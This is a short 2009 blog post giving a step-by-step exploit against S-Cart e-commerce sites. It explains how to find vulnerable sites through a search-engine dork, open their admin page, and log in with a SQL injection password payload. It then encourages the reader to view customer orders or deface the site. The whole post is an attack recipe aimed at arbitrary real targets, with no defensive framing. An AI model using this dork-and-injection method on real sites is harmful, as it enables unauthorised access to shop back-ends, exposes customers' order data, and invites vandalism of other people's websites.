s-cart vulnerability

Jumat, 02 Oktober 2009 · Posted in , ,

##############################################
S-Cart Bugs injection
Author : PeNcOpEt_CiNtA
##############################################
Bugs File : admin page --> /admin
Display : http://target.com/s-cart/admin
1. search in all search engine e.g --> allinurl:s-cart/index.phtml or "s-cart"
2. Get the target site like --> http://www.target.com/s-cart/index.phtml
3. and now go to admin page with change the Url to :
http://www.target.com/s-cart/admin --> auto open browser with login and passwd !!!
login : admin
passwd : ´or´´=´
4. If U are lucky, u can see the admin manager, show the table Order now or Deface s-cart page.
Ok let´s to try :P~

Leave a Reply

Diberdayakan oleh Blogger.